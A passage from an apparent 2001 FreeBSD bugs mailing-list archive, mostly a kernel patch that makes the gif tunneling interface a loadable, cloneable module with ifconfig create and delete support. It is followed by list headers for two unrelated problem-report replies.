(deleteif && (argc != 1 || all || namesonly || uponly || + downonly || supmedia)) + usage(); + /* no arguments is equivalent to '-a' */ if (!namesonly && argc < 1) all = 1; + /* -u and -d are meaningless with a specified interface */ + if (!namesonly && !all && (uponly || downonly)) + usage(); + /* -a and -l allow an address family arg to limit the output */ if (all || namesonly) { if (argc > 1) @@ -457,8 +482,26 @@ strncpy(name, *argv, sizeof(name)); argc--, argv++; + if (deleteif) { + ifdelete(name); + return 0; + } + /* check and maybe load support for this interface */ ifmaybeload(name); + + /* + * If we're actually going to try and do something with + * this device or the user want's a wildcard device, try + * and create it for them. If we create a wild card + * device and we don't have anything to do with it, just + * return now rather then printing it's status. This + * insures that wildcard creation prints the device name + * and only the device name. + */ + if (ifmaybecreate(name, sizeof(name), (argc != 0)) == 2 && + argc == 0) + return 0; } /* Check for address family */ @@ -1644,19 +1687,73 @@ #endif /*INET6*/ void -ifmaybeload(name) +name2typeunit(name, type, tlen, unit) + const char *name; + char *type; + size_t tlen; + int *unit; +{ + char *cp; + + /* copy the type */ + for (cp = type; !isdigit(name[0]) && name[0] != WILDCARDUNIT && + name[0] != '\0' && tlen > 0; name++, cp++, tlen--) + cp[0] = name[0]; + if (tlen == 0) { + goto error; + } + + /* figure out the unit */ + if (name[0] == WILDCARDUNIT) { + *unit = -1; + name++; + } else if (isdigit(name[0])) { + *unit = atoi(name); + for (; isdigit(name[0]); name++); + } else { + goto error; + } + + if (name[0] != '\0') + goto error; + + return; + +error: + type[0] = '\0'; +} + +void +typeunit2name(name, nlen, type, unit) char *name; + size_t nlen; + const char *type; + int unit; +{ + if(nlen <= 0) + return; + + if(snprintf(name, nlen, "%s%d", type, unit) > nlen-1) { + /* just null the name if it doesn't fit */ + name[0] = '\0'; + } +} + +void +ifmaybeload(name) + const char *name; { struct module_stat mstat; - int fileid, modid; - char ifkind[35], *cp, *dp; + int fileid, modid, unit; + char ifkind[35], type[35], *cp; /* turn interface and unit into module name */ - strcpy(ifkind, "if_"); - for (cp = name, dp = ifkind + 3; (*cp != 0) && !isdigit(*cp); cp++, dp++) - *dp = *cp; - *dp = 0; + name2typeunit(name, type, sizeof(type), &unit); + if (type[0] == '\0') + return; + if (snprintf(ifkind, sizeof(ifkind), "if_%s", type) >= sizeof(ifkind)) + return; /* scan files in kernel */ mstat.version = sizeof(struct module_stat); @@ -1680,4 +1777,98 @@ /* not present, we should try to load it */ kldload(ifkind); +} + +/* + * Try to create the interface through a control node. If nothing is + * created, return 0. If a static interface is created return 1. If a + * wildcard interface is created, return 2. + */ +int +ifmaybecreate(name, len, trystatic) + char *name; + size_t len; + int trystatic; +{ + char if_dev[40]; + int d; + int wildcard = 0; + struct if_manage ifman; + + bzero(&ifman, sizeof(ifman)); + + /* turn interface and unit into control device name */ + name2typeunit(name, ifman.ifman_name, sizeof(ifman.ifman_name), + &ifman.ifman_unit); + if (ifman.ifman_name[0] == '\0') + return (0); + if (ifman.ifman_unit >= 0 && !trystatic) + return (0); + if (snprintf(if_dev, sizeof(if_dev), "/dev/if_%s", + ifman.ifman_name) >= sizeof(if_dev)) + return (0); + if (ifman.ifman_unit < 0) + wildcard = 1; + + /* try to open the control device */ + d = open(if_dev, O_RDWR); + if (d == -1) + return (0); + + /* try to create the device in question */ + ifman.ifman_action = IFMAN_CREATE; + if (ioctl(d, IOCIFMANAGE, &ifman) == -1) { + close(d); + return (0); + } + close(d); + + /* + * our name might have been changed (in the wildcard case) so + * update it. + * XXX: if the device is on crack and mangles non-wildcard + * units, this could be weird. + */ + typeunit2name(name, len, ifman.ifman_name, ifman.ifman_unit); + + if (name[0] != '\0' && wildcard) { + printf("%s\n", name); + return (2); + } + + return (1); +} + +void +ifdelete(name) + const char *name; +{ + char if_dev[40]; + int d; + struct if_manage ifman; + + bzero(&ifman, sizeof(ifman)); + + ifman.ifman_action = IFMAN_DELETE; + name2typeunit(name, ifman.ifman_name, sizeof(ifman.ifman_name), + &ifman.ifman_unit); + if (ifman.ifman_name[0] == '\0') + errx(1, "invalid interface"); + if (ifman.ifman_unit < 0) + errx(1, "can't delete wildcard interface"); + if (snprintf(if_dev, sizeof(if_dev), "/dev/if_%s", + ifman.ifman_name) >= sizeof(if_dev)) + return; + + /* try to open the control device */ + d = open(if_dev, O_RDWR); + if (d == -1) + return; + + /* try to create the device in question */ + if (ioctl(d, IOCIFMANAGE, &ifman) == -1) { + close(d); + err(1, "IOCIFMANAGE error"); + } + close(d); } Index: sys/conf/files =================================================================== RCS file: /home/ncvs/src/sys/conf/files,v retrieving revision 1.530 diff -u -u -r1.530 files --- sys/conf/files 2001/06/05 04:26:12 1.530 +++ sys/conf/files 2001/06/08 19:48:21 @@ -881,7 +881,7 @@ net/if_ethersubr.c optional ether net/if_faith.c count faith net/if_fddisubr.c optional fddi -net/if_gif.c count gif +net/if_gif.c optional gif net/if_iso88025subr.c optional token net/if_loop.c optional loop net/if_media.c standard Index: sys/conf/majors =================================================================== RCS file: /home/ncvs/src/sys/conf/majors,v retrieving revision 1.124 diff -u -u -r1.124 majors --- sys/conf/majors 2001/05/29 18:49:46 1.124 +++ sys/conf/majors 2001/06/07 23:58:18 @@ -179,6 +179,7 @@ 160 spic Sony Programmable I/O Controller (jogdial) 161 swdoc Sitara networks watchdog device 162 digi Digiboard +163 if_gif Generic Tunneling control device 200 ?? entries from 200-252 are reserved for local use 252 ?? entries from 200-252 are reserved for local use 254 internal Used internally by the kernel Index: sys/i386/conf/GENERIC =================================================================== RCS file: /home/ncvs/src/sys/i386/conf/GENERIC,v retrieving revision 1.311 diff -u -u -r1.311 GENERIC --- sys/i386/conf/GENERIC 2001/05/30 03:18:22 1.311 +++ sys/i386/conf/GENERIC 2001/06/08 23:16:04 @@ -210,7 +210,7 @@ device tun # Packet tunnel. device pty # Pseudo-ttys (telnet etc) device md # Memory "disks" -device gif 4 # IPv6 and IPv4 tunneling +device gif # IPv6 and IPv4 tunneling device faith 1 # IPv6-to-IPv4 relaying (translation) # The `bpf' device enables the Berkeley Packet Filter. Index: sys/ia64/conf/GENERIC =================================================================== RCS file: /home/ncvs/src/sys/ia64/conf/GENERIC,v retrieving revision 1.10 diff -u -u -r1.10 GENERIC --- sys/ia64/conf/GENERIC 2001/05/29 18:49:03 1.10 +++ sys/ia64/conf/GENERIC 2001/06/09 00:55:41 @@ -140,7 +140,7 @@ device tun # Packet tunnel. device pty # Pseudo-ttys (telnet etc) device md # Memory "disks" -device gif 4 # IPv6 and IPv4 tunneling +device gif # IPv6 and IPv4 tunneling device faith 1 # IPv6-to-IPv4 relaying/(translation) # The `bpf' device enables the Berkeley Packet Filter. Index: sys/alpha/conf/GENERIC =================================================================== RCS file: /home/ncvs/src/sys/alpha/conf/GENERIC,v retrieving revision 1.113 diff -u -u -r1.113 GENERIC --- sys/alpha/conf/GENERIC 2001/05/30 03:19:05 1.113 +++ sys/alpha/conf/GENERIC 2001/06/09 00:55:14 @@ -165,7 +165,7 @@ device tun # Packet tunnel. device pty # Pseudo-ttys (telnet etc) device md # Memory "disks" -device gif 4 # IPv6 and IPv4 tunneling +device gif # IPv6 and IPv4 tunneling device faith 1 # IPv6-to-IPv4 relaying/(translation) # The `bpf' device enables the Berkeley Packet Filter. Index: sys/net/if_gif.c =================================================================== RCS file: /home/ncvs/src/sys/net/if_gif.c,v retrieving revision 1.9 diff -u -u -r1.9 if_gif.c --- sys/net/if_gif.c 2001/06/03 17:31:11 1.9 +++ sys/net/if_gif.c 2001/06/08 23:52:55 @@ -1,4 +1,4 @@ -/* $FreeBSD: src/sys/net/if_gif.c,v 1.9 2001/06/03 17:31:11 yar Exp $ */ +/* $FreeBSD: src/sys/net/if_gif.c,v 1.9 2001/06/03 17:31:11 yar Exp $ */ /* $KAME: if_gif.c,v 1.28 2000/06/20 12:30:03 jinmei Exp $ */ /* @@ -44,6 +44,9 @@ #include #include #include +#include +#include /* XXX: Shouldn't really be required! */ +#include #include #include @@ -58,6 +61,8 @@ #include #include #include +#include +#include #endif /* INET */ #ifdef INET6 @@ -74,28 +79,68 @@ #include #include -#include "gif.h" +#if defined(__FreeBSD__) +#define NBPFILTER 1 +#else #include "bpf.h" #define NBPFILTER NBPF +#endif #include - -#if NGIF > 0 -void gifattach __P((void *)); +#define GIFNAME "gif" +#define GIFDEV "if_gif" +#define GIF_MAXUNIT 0x7fff /* ifp->if_unit is only 15 bits */ + +static MALLOC_DEFINE(M_GIF, "gif", "Generic Tunnel Interface"); +static struct rman gifunits[1]; +TAILQ_HEAD(gifhead, gif_softc) gifs = TAILQ_HEAD_INITIALIZER(gifs); + +static int gifcreate __P((int *)); +static int gifdelete __P((int)); +static int gifmodevent __P((module_t, int, void *)); +static struct gif_softc *gifunit2sc __P((int unit)); static int gif_encapcheck __P((const struct mbuf *, int, int, void *)); -#ifdef INET -extern struct protosw in_gif_protosw; -#endif -#ifdef INET6 -extern struct ip6protosw in6_gif_protosw; -#endif -/* - * gif global variable definitions - */ -static int ngif; /* number of interfaces */ -static struct gif_softc *gif = 0; +#ifdef INET +extern struct domain inetdomain; +struct ipprotosw in_gif_protosw = +{ SOCK_RAW, &inetdomain, 0/*IPPROTO_IPV[46]*/, PR_ATOMIC|PR_ADDR, + in_gif_input, rip_output, 0, rip_ctloutput, + 0, + 0, 0, 0, 0, + &rip_usrreqs +}; +#endif +#ifdef INET6 +extern struct domain6 inet6domain; +struct ip6protosw in6_gif_protosw = +{ SOCK_RAW, &inet6domain, 0/*IPPROTO_IPV[46]*/, PR_ATOMIC|PR_ADDR, + in6_gif_input, rip6_output, 0, rip6_ctloutput, + 0, + 0, 0, 0, 0, + &rip6_usrreqs +}; +#endif + +static d_ioctl_t gifioctl; + +#define CDEV_MAJOR 163 +static struct cdevsw gif_cdevsw = { + /* open */ nullopen, + /* close */ nullclose, + /* read */ noread, + /* write */ nowrite, + /* ioctl */ gifioctl, + /* poll */ nopoll, + /* mmap */ nommap, + /* strategy */ nostrategy, + /* name */ GIFDEV, + /* maj */ CDEV_MAJOR, + /* dump */ nodump, + /* psize */ nopsize, + /* flags */ 0, +}; #ifndef MAX_GIF_NEST /* @@ -110,62 +155,252 @@ #endif static int max_gif_nesting = MAX_GIF_NEST; -void -gifattach(dummy) - void *dummy; +static struct gif_softc * +gifunit2sc(unit) + int unit; { - register struct gif_softc *sc; - register int i; + struct gif_softc *sc; + + TAILQ_FOREACH(sc, &gifs, gif_link) { + if (sc->gif_if.if_unit == unit) + break; + } + if (sc->gif_if.if_unit != unit) + return NULL; + + return sc; +} + +static int +gifcreate(unit) + int *unit; +{ + struct resource *r; + struct gif_softc *sc; + + if (*unit > GIF_MAXUNIT) + return (ENXIO); - ngif = NGIF; - gif = sc = malloc (ngif * sizeof(struct gif_softc), M_DEVBUF, M_WAITOK); - bzero(sc, ngif * sizeof(struct gif_softc)); - for (i = 0; i < ngif; sc++, i++) { - sc->gif_if.if_name = "gif"; - sc->gif_if.if_unit = i; + if (*unit < 0) { + r = rman_reserve_resource(gifunits, 0, GIF_MAXUNIT, 1, + RF_ALLOCATED | RF_ACTIVE, NULL); + if (r == NULL) + return (ENOSPC); + *unit = rman_get_start(r); + } else { + r = rman_reserve_resource(gifunits, *unit, *unit, 1, + RF_ALLOCATED | RF_ACTIVE, NULL); + if (r == NULL) + return (EBUSY); + } + + sc = malloc (sizeof(struct gif_softc), M_GIF, M_WAITOK); + bzero(sc, sizeof(struct gif_softc)); + sc->gif_if.if_softc = sc; + sc->gif_if.if_name = GIFNAME; + sc->gif_if.if_unit = *unit; + sc->r_unit = r; - sc->encap_cookie4 = sc->encap_cookie6 = NULL; + sc->encap_cookie4 = sc->encap_cookie6 = NULL; #ifdef INET - sc->encap_cookie4 = encap_attach_func(AF_INET, -1, - gif_encapcheck, &in_gif_protosw, sc); - if (sc->encap_cookie4 == NULL) { - printf("%s: attach failed\n", if_name(&sc->gif_if)); - continue; - } + sc->encap_cookie4 = encap_attach_func(AF_INET, -1, + gif_encapcheck, &in_gif_protosw, sc); + if (sc->encap_cookie4 == NULL) { + free(sc, M_GIF); + return (ENOMEM); + } #endif #ifdef INET6 - sc->encap_cookie6 = encap_attach_func(AF_INET6, -1, - gif_encapcheck, (struct protosw *)&in6_gif_protosw, sc); - if (sc->encap_cookie6 == NULL) { - if (sc->encap_cookie4) { - encap_detach(sc->encap_cookie4); - sc->encap_cookie4 = NULL; - } - printf("%s: attach failed\n", if_name(&sc->gif_if)); - continue; + sc->encap_cookie6 = encap_attach_func(AF_INET6, -1, + gif_encapcheck, (struct protosw *)&in6_gif_protosw, sc); + if (sc->encap_cookie6 == NULL) { + if (sc->encap_cookie4) { + encap_detach(sc->encap_cookie4); + sc->encap_cookie4 = NULL; } + free(sc, M_GIF); + return (ENOMEM); + } #endif - sc->gif_if.if_mtu = GIF_MTU; - sc->gif_if.if_flags = IFF_POINTOPOINT | IFF_MULTICAST; - sc->gif_if.if_ioctl = gif_ioctl; - sc->gif_if.if_output = gif_output; - sc->gif_if.if_type = IFT_GIF; - sc->gif_if.if_snd.ifq_maxlen = IFQ_MAXLEN; - if_attach(&sc->gif_if); + sc->gif_if.if_mtu = GIF_MTU; + sc->gif_if.if_flags = IFF_POINTOPOINT | IFF_MULTICAST; + sc->gif_if.if_ioctl = gif_ifioctl; + sc->gif_if.if_output = gif_output; + sc->gif_if.if_type = IFT_GIF; + sc->gif_if.if_snd.ifq_maxlen = IFQ_MAXLEN; + if_attach(&sc->gif_if); #if NBPFILTER > 0 #ifdef HAVE_OLD_BPF - bpfattach(&sc->gif_if, DLT_NULL, sizeof(u_int)); + bpfattach(&sc->gif_if, DLT_NULL, sizeof(u_int)); #else - bpfattach(&sc->gif_if.if_bpf, &sc->gif_if, DLT_NULL, sizeof(u_int)); + bpfattach(&sc->gif_if.if_bpf, &sc->gif_if, DLT_NULL, sizeof(u_int)); +#endif +#endif + + TAILQ_INSERT_TAIL(&gifs, sc, gif_link); + + return (0); +} + +static int +gifdelete(unit) + int unit; +{ + int err; + struct gif_softc *sc; + + sc = gifunit2sc(unit); + if (sc == NULL) + return (ENXIO); + + bpfdetach(&sc->gif_if); + if_detach(&sc->gif_if); + + if (sc->encap_cookie4 != NULL) { + err = encap_detach(sc->encap_cookie4); + KASSERT(err == 0, ("Unexpected error detaching encap_cookie4")); + } + if (sc->encap_cookie6 != NULL) { + err = encap_detach(sc->encap_cookie6); + KASSERT(err == 0, ("Unexpected error detaching encap_cookie6")); + } + + if (sc->gif_psrc) + free((caddr_t)sc->gif_psrc, M_IFADDR); + if (sc->gif_pdst) + free((caddr_t)sc->gif_pdst, M_IFADDR); + + err = rman_release_resource(sc->r_unit); + KASSERT(err == 0, ("Unexpected error freeing resource")); + + TAILQ_REMOVE(&gifs, sc, gif_link); + free(sc, M_GIF); + + return 0; +} + +static int +gifmodevent(mod, type, data) + module_t mod; + int type; + void *data; +{ + static dev_t dev; + int err; + + switch (type) { + case MOD_LOAD: + if (!devfs_present) { + err = cdevsw_add(&gif_cdevsw); + if (err != 0) { + return (err); + } + } + gifunits->rm_type = RMAN_ARRAY; + gifunits->rm_descr = "configurable if_gif units"; + err = rman_init(gifunits); + if (err != 0) { + if (!devfs_present) + cdevsw_remove(&gif_cdevsw); + return (err); + } + err = rman_manage_region(gifunits, 0, GIF_MAXUNIT); + if (err != 0) { + printf("%s: gifunits: rman_manage_region: Failed %d\n", + GIFNAME, err); + rman_fini(gifunits); + if (!devfs_present) + cdevsw_remove(&gif_cdevsw); + return (err); + } + dev = make_dev(&gif_cdevsw, unit2minor(0), + UID_ROOT, GID_WHEEL, 0600, GIFDEV, 0); + +#ifdef INET6 + ip6_gif_hlim = GIF_HLIM; #endif + + break; + case MOD_UNLOAD: + destroy_dev(dev); + + while (!TAILQ_EMPTY(&gifs)) + gifdelete(TAILQ_FIRST(&gifs)->gif_if.if_unit); + + err = rman_fini(gifunits); + if (err != 0) + return (err); + + if (!devfs_present) + cdevsw_remove(&gif_cdevsw); + +#ifdef INET6 + ip6_gif_hlim = 0; #endif + break; } + return 0; } + +static moduledata_t gif_mod = { + "if_gif", + gifmodevent, + 0 +}; -PSEUDO_SET(gifattach, if_gif); +DECLARE_MODULE(if_gif, gif_mod, SI_SUB_PSEUDO, SI_ORDER_ANY); static int +gifioctl(dev, cmd, data, flag, p) + dev_t dev; + u_long cmd; + caddr_t data; + int flag; + struct proc *p; +{ + int err; + struct if_manage *ifman; + struct gif_softc *sc; + + /* all actions require root, so check now. */ + err = suser(p); + if (err != 0) + return (err); + + switch (cmd) { + case IOCIFMANAGE: + ifman = (void*)data; + switch (ifman->ifman_action) { + case IFMAN_CREATE: + if (strcmp(GIFNAME, ifman->ifman_name) != 0) + return (EINVAL); + err = gifcreate(&ifman->ifman_unit); + if (err != 0) + return (err); + break; + case IFMAN_DELETE: + sc = gifunit2sc(ifman->ifman_unit); + if (sc == NULL) + return (ENXIO); + if (sc->gif_if.if_flags & IFF_UP) + return (EBUSY); + err = gifdelete(ifman->ifman_unit); + if(err != 0) + return (err); + break; + default: + return (EINVAL); + } + break; + default: + return (ENOTTY); + } + + return (0); +} + +static int gif_encapcheck(m, off, proto, arg) const struct mbuf *m; int off; @@ -390,7 +625,7 @@ /* XXX how should we handle IPv6 scope on SIOC[GS]IFPHYADDR? */ int -gif_ioctl(ifp, cmd, data) +gif_ifioctl(ifp, cmd, data) struct ifnet *ifp; u_long cmd; caddr_t data; @@ -400,8 +635,8 @@ int error = 0, size; struct sockaddr *dst, *src; struct sockaddr *sa; - int i; int s; + struct ifnet *ifp2; struct gif_softc *sc2; switch (cmd) { @@ -451,9 +686,12 @@ break; #endif } + + TAILQ_FOREACH(ifp2, &ifnet, if_link) { + if (strcmp(ifp2->if_name, GIFNAME) != 0) + continue; + sc2 = ifp2->if_softc; - for (i = 0; i < ngif; i++) { - sc2 = gif + i; if (sc2 == sc) continue; if (!sc2->gif_pdst || !sc2->gif_psrc) @@ -623,4 +861,3 @@ bad: return error; } -#endif /*NGIF > 0*/ Index: sys/net/if_gif.h =================================================================== RCS file: /home/ncvs/src/sys/net/if_gif.h,v retrieving revision 1.3 diff -u -u -r1.3 if_gif.h --- sys/net/if_gif.h 2000/07/04 16:35:04 1.3 +++ sys/net/if_gif.h 2001/06/08 17:20:27 @@ -62,6 +62,8 @@ int gif_flags; const struct encaptab *encap_cookie4; const struct encaptab *encap_cookie6; + struct resource *r_unit; /* resource allocated for this unit */ + TAILQ_ENTRY(gif_softc) gif_link; /* all gif's are linked */ }; #define gif_ro gifsc_gifscr.gifscr_ro @@ -77,6 +79,6 @@ void gif_input __P((struct mbuf *, int, struct ifnet *)); int gif_output __P((struct ifnet *, struct mbuf *, struct sockaddr *, struct rtentry *)); -int gif_ioctl __P((struct ifnet *, u_long, caddr_t)); +int gif_ifioctl __P((struct ifnet *, u_long, caddr_t)); #endif /* _NET_IF_GIF_H_ */ Index: sys/net/if.h =================================================================== RCS file: /home/ncvs/src/sys/net/if.h,v retrieving revision 1.61 diff -u -u -r1.61 if.h --- sys/net/if.h 2001/02/21 06:39:56 1.61 +++ sys/net/if.h 2001/06/08 02:01:44 @@ -241,6 +241,18 @@ struct sockaddr_storage dstaddr; /* out */ }; +/* + * Structure and definiation for IOCIFMANAGE + */ +struct if_manage { + int ifman_action; +#define IFMAN_CREATE 0 +#define IFMAN_DELETE 1 + char ifman_name[IFNAMSIZ]; + int ifman_unit; +}; +#define IOCIFMANAGE _IOWR('i', 190, struct if_manage) + #ifdef _KERNEL #ifdef MALLOC_DECLARE MALLOC_DECLARE(M_IFADDR); Index: sys/net/if_stf.c =================================================================== RCS file: /home/ncvs/src/sys/net/if_stf.c,v retrieving revision 1.6 diff -u -u -r1.6 if_stf.c --- sys/net/if_stf.c 2001/02/03 11:46:35 1.6 +++ sys/net/if_stf.c 2001/06/08 19:41:26 @@ -102,7 +102,6 @@ #include #include -#include #include #include @@ -115,16 +114,11 @@ #include "bpf.h" #define NBPFILTER NBPF #include "stf.h" -#include "gif.h" /*XXX*/ #if NBPFILTER > 0 #include #endif -#if NGIF > 0 -#include -#endif - #if NSTF > 0 #if NSTF != 1 # error only single stf interface allowed @@ -146,11 +140,7 @@ static struct stf_softc *stf; static int nstf; -#if NGIF > 0 -extern int ip_gif_ttl; /*XXX*/ -#else -static int ip_gif_ttl = 40; /*XXX*/ -#endif +static int ip_stf_ttl = 40; extern struct protosw in_stf_protosw; @@ -364,7 +354,7 @@ &ip->ip_src, sizeof(ip->ip_src)); bcopy(GET_V4(&dst6->sin6_addr), &ip->ip_dst, sizeof(ip->ip_dst)); ip->ip_p = IPPROTO_IPV6; - ip->ip_ttl = ip_gif_ttl; /*XXX*/ + ip->ip_ttl = ip_stf_ttl; ip->ip_len = m->m_pkthdr.len; /*host order*/ if (ifp->if_flags & IFF_LINK1) ip_ecn_ingress(ECN_ALLOWED, &ip->ip_tos, &tos); Index: sys/netinet/in.c =================================================================== RCS file: /home/ncvs/src/sys/netinet/in.c,v retrieving revision 1.53 diff -u -u -r1.53 in.c --- sys/netinet/in.c 2001/05/11 14:37:34 1.53 +++ sys/netinet/in.c 2001/06/08 19:47:09 @@ -51,11 +51,6 @@ #include -#include "gif.h" -#if NGIF > 0 -#include -#endif - static MALLOC_DEFINE(M_IPMADDR, "in_multi", "internet multicast address"); static int in_mask2len __P((struct in_addr *)); @@ -200,7 +195,6 @@ int error, hostIsNew, maskIsNew, s; u_long i; -#if NGIF > 0 if (ifp && ifp->if_type == IFT_GIF) { switch (cmd) { case SIOCSIFPHYADDR: @@ -210,10 +204,9 @@ return(error); case SIOCGIFPSRCADDR: case SIOCGIFPDSTADDR: - return gif_ioctl(ifp, cmd, data); + return ifp->if_ioctl(ifp, cmd, data); } } -#endif switch (cmd) { case SIOCALIFADDR: Index: sys/netinet/in_gif.c =================================================================== RCS file: /home/ncvs/src/sys/netinet/in_gif.c,v retrieving revision 1.9 diff -u -u -r1.9 in_gif.c --- sys/netinet/in_gif.c 2001/02/04 16:08:12 1.9 +++ sys/netinet/in_gif.c 2001/06/08 19:53:37 @@ -67,17 +67,11 @@ #include -#include "gif.h" - #include #include -#if NGIF > 0 int ip_gif_ttl = GIF_TTL; -#else -int ip_gif_ttl = 0; -#endif SYSCTL_INT(_net_inet_ip, IPCTL_GIF_TTL, gifttl, CTLFLAG_RW, &ip_gif_ttl, 0, ""); Index: sys/netinet/in_proto.c =================================================================== RCS file: /home/ncvs/src/sys/netinet/in_proto.c,v retrieving revision 1.55 diff -u -u -r1.55 in_proto.c --- sys/netinet/in_proto.c 2000/08/03 14:09:52 1.55 +++ sys/netinet/in_proto.c 2001/06/08 19:36:40 @@ -77,11 +77,6 @@ #endif #endif /* IPSEC */ -#include "gif.h" -#if NGIF > 0 -#include -#endif - #include "stf.h" #if NSTF > 0 #include @@ -205,16 +200,6 @@ &rip_usrreqs }, }; - -#if NGIF > 0 -struct ipprotosw in_gif_protosw = -{ SOCK_RAW, &inetdomain, 0/*IPPROTO_IPV[46]*/, PR_ATOMIC|PR_ADDR, - in_gif_input, rip_output, 0, rip_ctloutput, - 0, - 0, 0, 0, 0, - &rip_usrreqs -}; -#endif /*NGIF*/ #if NSTF > 0 struct ipprotosw in_stf_protosw = Index: sys/netinet6/in6.c =================================================================== RCS file: /home/ncvs/src/sys/netinet6/in6.c,v retrieving revision 1.11 diff -u -u -r1.11 in6.c --- sys/netinet6/in6.c 2001/01/18 06:07:53 1.11 +++ sys/netinet6/in6.c 2001/06/09 00:01:41 @@ -97,11 +97,6 @@ #include #include -#include "gif.h" -#if NGIF > 0 -#include -#endif - #include MALLOC_DEFINE(M_IPMADDR, "in6_multi", "internet multicast address"); @@ -343,7 +338,6 @@ /* * xxx should prevent processes for link-local addresses? */ -#if NGIF > 0 if (ifp && ifp->if_type == IFT_GIF) { switch (cmd) { case SIOCSIFPHYADDR_IN6: @@ -352,10 +346,10 @@ /*fall through*/ case SIOCGIFPSRCADDR_IN6: case SIOCGIFPDSTADDR_IN6: - return gif_ioctl(ifp, cmd, data); + return ifp->if_ioctl(ifp, cmd, data); } } -#endif + switch (cmd) { case SIOCGETSGCNT_IN6: case SIOCGETMIFCNT_IN6: Index: sys/netinet6/in6_proto.c =================================================================== RCS file: /home/ncvs/src/sys/netinet6/in6_proto.c,v retrieving revision 1.12 diff -u -u -r1.12 in6_proto.c --- sys/netinet6/in6_proto.c 2001/06/01 09:51:14 1.12 +++ sys/netinet6/in6_proto.c 2001/06/08 23:31:49 @@ -122,11 +122,6 @@ #include -#include "gif.h" -#if NGIF > 0 -#include -#endif - #include /* @@ -244,16 +239,6 @@ }, }; -#if NGIF > 0 -struct ip6protosw in6_gif_protosw = -{ SOCK_RAW, &inet6domain, 0/*IPPROTO_IPV[46]*/, PR_ATOMIC|PR_ADDR, - in6_gif_input, rip6_output, 0, rip6_ctloutput, - 0, - 0, 0, 0, 0, - &rip6_usrreqs -}; -#endif /*NGIF*/ - extern int in6_inithead __P((void **, int)); struct domain inet6domain = @@ -292,11 +277,7 @@ int ip6_dad_count = 1; /* DupAddrDetectionTransmits */ u_int32_t ip6_flow_seq; int ip6_auto_flowlabel = 1; -#if NGIF > 0 -int ip6_gif_hlim = GIF_HLIM; -#else int ip6_gif_hlim = 0; -#endif int ip6_use_deprecated = 1; /* allow deprecated addr (RFC2462 5.5.4) */ int ip6_rr_prune = 5; /* router renumbering prefix * walk list every 5 sec. */ Index: sys/netinet6/ip6_input.c =================================================================== RCS file: /home/ncvs/src/sys/netinet6/ip6_input.c,v retrieving revision 1.26 diff -u -u -r1.26 ip6_input.c --- sys/netinet6/ip6_input.c 2001/05/22 17:32:02 1.26 +++ sys/netinet6/ip6_input.c 2001/06/08 23:41:41 @@ -113,7 +113,6 @@ #include #include "faith.h" -#include "gif.h" #include Index: sys/modules/Makefile =================================================================== RCS file: /home/ncvs/src/sys/modules/Makefile,v retrieving revision 1.183 diff -u -u -r1.183 Makefile --- sys/modules/Makefile 2001/05/31 21:44:19 1.183 +++ sys/modules/Makefile 2001/06/09 01:04:54 @@ -8,6 +8,7 @@ SUBDIR= 3dfx accf_data accf_http agp aha amr an aue \ cam ccd cd9660 coda cue dc de dgm digi ed fdescfs fxp if_disc if_ef \ + if_gif \ if_ppp if_sl if_tap if_tun ip6fw ipfilter ipfw ispfw joy kue lge \ libmchain linux lnc md mii mlx msdosfs ncp netgraph nfs nge ntfs \ nullfs nwfs pcn portalfs procfs ${_random} \ --- sys/modules/if_gif/Makefile.orig Fri Jun 8 19:00:25 2001 +++ sys/modules/if_gif/Makefile Fri Jun 8 19:04:43 2001 @@ -0,0 +1,18 @@ +# $FreeBSD$ + +.PATH: ${.CURDIR}/../../net ${.CURDIR}/../../netinet ${.CURDIR}/../../netinet6 + +KMOD= if_gif +SRCS= if_gif.c in_gif.c in6_gif.c opt_inet.h opt_inet6.h opt_mrouting.h +NOMAN= + +opt_inet.h: + echo "#define INET 1" > ${.TARGET} + +opt_inet6.h: + echo "#define INET6 1" > ${.TARGET} + +opt_mrouting.h: + echo "#define MROUTING 1" > ${.TARGET} + +.include >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 21:33:11 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 248D137B403; Fri, 8 Jun 2001 21:33:10 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f594XAh01846; Fri, 8 Jun 2001 21:33:10 -0700 (PDT) (envelope-from dd) Date: Fri, 8 Jun 2001 21:33:10 -0700 (PDT) From: Message-Id: <200106090433.f594XAh01846@freefall.freebsd.org> To: sgreear@vsni.com, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org, dd@FreeBSD.org Subject: Re: bin/27982: dump(8) doesn't seem to correctly grok the -T option. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: dump(8) doesn't seem to correctly grok the -T option. State-Changed-From-To: open->analyzed State-Changed-By: dd State-Changed-When: Fri Jun 8 21:32:52 PDT 2001 State-Changed-Why: Committed, thanks! Responsible-Changed-From-To: freebsd-bugs->dd Responsible-Changed-By: dd Responsible-Changed-When: Fri Jun 8 21:32:52 PDT 2001 Responsible-Changed-Why: My MFC reminder. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27982 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 21:40: 7 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6CE2E37B401 for ; Fri, 8 Jun 2001 21:40:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f594e3k02273; Fri, 8 Jun 2001 21:40:03 -0700 (PDT) (envelope-from gnats) Date: Fri, 8 Jun 2001 21:40:03 -0700 (PDT) Message-Id: <200106090440.f594e3k02273@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Dima Dorfman Subject: Re: bin/27972: talk feature Reply-To: Dima Dorfman Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/27972; it has been noted by GNATS. 